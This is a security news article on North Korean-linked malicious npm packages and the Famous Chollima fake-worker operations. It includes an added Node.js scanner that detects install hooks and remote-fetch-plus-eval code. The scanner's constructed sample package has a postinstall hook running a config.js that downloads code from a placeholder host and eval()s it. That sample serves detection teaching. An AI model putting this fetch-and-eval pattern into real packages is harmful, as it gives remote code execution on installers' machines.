North Korean Hackers Target Developers Using Malicious npm Packages

Threat actors linked to North Korea have been detected distributing malicious packages on the npm registry, highlighting their “coordinated and relentless” attempts to target developers with malware and steal cryptocurrency assets.

Between August 12 and 27, 2024, several packages—such as temp-etherscan-api, ethersscan-api, telegram-con, helmet-validate, and qq-console—were identified as part of this campaign.

Phylum, a software supply chain security firm, indicated that the behavior of these packages, particularly qq-console, suggests they are connected to the North Korean campaign known as “Contagious Interview.” This campaign involves deceiving developers through fake job interviews, tricking them into downloading malicious npm packages or counterfeit video conferencing software installers like MiroTalk from fraudulent websites.

The ultimate goal is to deploy a Python payload named InvisibleFerret, which extracts sensitive data from cryptocurrency wallet browser extensions and maintains persistence on the host using legitimate remote desktop software such as AnyDesk. CrowdStrike is tracking this activity under the name Famous Chollima.

The new package helmet-validate introduces a novel method by embedding a JavaScript file called config.js that executes JavaScript hosted on a remote domain (“ipcheck[.]cloud”) using the eval() function.

Phylum noted that ipcheck[.]cloud resolves to the same IP address (167[.]88[.]36[.]13) previously associated with mirotalk[.]net, suggesting a connection between the two attacks.

Another package, sass-notification, was uploaded on August 27, 2024, and resembles previously identified npm libraries like call-blockflow, which are linked to another North Korean threat group called Moonstone Sleet. These attacks are characterized by obfuscated JavaScript used to execute batch and PowerShell scripts that download, decrypt, and run a remote payload as a DLL, while attempting to erase all traces of malicious activity, leaving a seemingly harmless package on the victim’s machine.
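As an added defender-side example (not code from the article, Phylum, or CrowdStrike), the following Node.js heuristic flags the two traits described above: install-time lifecycle hooks in package.json, and JavaScript that fetches a remote resource and hands it to eval() or new Function(). The package layout, file contents, and the ipcheck.invalid domain are constructed placeholders, not the real helmet-validate contents.

```javascript
// Added example: heuristic scan of an npm package for the "fetch remote code, then eval() it"
// pattern and for install-time lifecycle hooks. Input is a map of relative path -> file text,
// so it runs offline on a constructed sample rather than on a downloaded package.
const REMOTE_FETCH = /\b(?:https?\.get|https?\.request|fetch|axios\.get)\s*\(/;
const DYNAMIC_EXEC = /\b(?:eval|new\s+Function)\s*\(/;
const LIFECYCLE_HOOKS = ["preinstall", "install", "postinstall"];

function scanPackage(files) {
  const findings = [];

  // 1. Lifecycle hooks run automatically on `npm install`; any of them deserves a look.
  const manifest = files["package.json"];
  if (manifest) {
    const scripts = JSON.parse(manifest).scripts || {};
    for (const hook of LIFECYCLE_HOOKS) {
      if (scripts[hook]) {
        findings.push({ file: "package.json", reason: `lifecycle hook ${hook}: ${scripts[hook]}` });
      }
    }
  }

  // 2. Remote fetch combined with dynamic execution is the strongest signal; bare eval() is weaker.
  //    This is a textual heuristic: it will also fire on eval() inside comments or strings.
  for (const [path, src] of Object.entries(files)) {
    if (!path.endsWith(".js")) continue;
    const fetchesRemote = REMOTE_FETCH.test(src);
    const executesDynamic = DYNAMIC_EXEC.test(src);
    if (fetchesRemote && executesDynamic) {
      findings.push({ file: path, reason: "remote fetch combined with eval()/new Function" });
    } else if (executesDynamic) {
      findings.push({ file: path, reason: "dynamic code execution" });
    }
  }
  return findings;
}

// Constructed sample imitating the described layout: a postinstall hook that runs config.js,
// and a config.js that fetches a remote body and eval()s it (placeholder .invalid domain).
const SAMPLE_PACKAGE = {
  "package.json": JSON.stringify({ name: "sample-validate", version: "1.0.0",
                                   scripts: { postinstall: "node config.js" } }),
  "config.js": 'const https = require("https");\n' +
               'https.get("https://ipcheck.invalid/x", r => { let b = ""; ' +
               'r.on("data", d => b += d); r.on("end", () => eval(b)); });',
  "index.js": 'module.exports = { validate: v => typeof v === "string" };',
};

console.log(scanPackage(SAMPLE_PACKAGE));
```

The same scan can be pointed at an unpacked tarball (npm pack, then read each file into the map) before a dependency is allowed into a build.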

Famous Chollima Posing as IT Workers in U.S. Firms

The revelation comes as CrowdStrike associates Famous Chollima (formerly BadClone) with insider threat operations where they infiltrate corporate environments under the guise of legitimate employment.

“Famous Chollima conducted these operations by securing contract or full-time positions using falsified or stolen identities to bypass background checks,” the company reported. “During the job application process, these malicious insiders often presented résumés with prior employment at well-known companies, including additional lesser-known firms and no employment gaps.”

While these attacks are primarily financially motivated, some incidents have involved the theft of sensitive information. CrowdStrike has identified threat actors applying to or working at over 100 unique companies in the past year, with a majority based in the U.S., Saudi Arabia, France, the Philippines, and Ukraine, among others.

Targeted sectors include technology, fintech, financial services, professional services, retail, transportation, manufacturing, insurance, pharmaceutical, social media, and media companies.

“Once insiders gained access to victim networks, they performed minimal tasks related to their job roles,” the company added. In some cases, they also attempted to exfiltrate data using Git, SharePoint, and OneDrive.

“Additionally, insiders installed various remote management tools like RustDesk, AnyDesk, TinyPilot, VS Code Dev Tunnels, and Google Chrome Remote Desktop. These tools were used alongside company network credentials, allowing multiple IP addresses to access the victim’s system.”
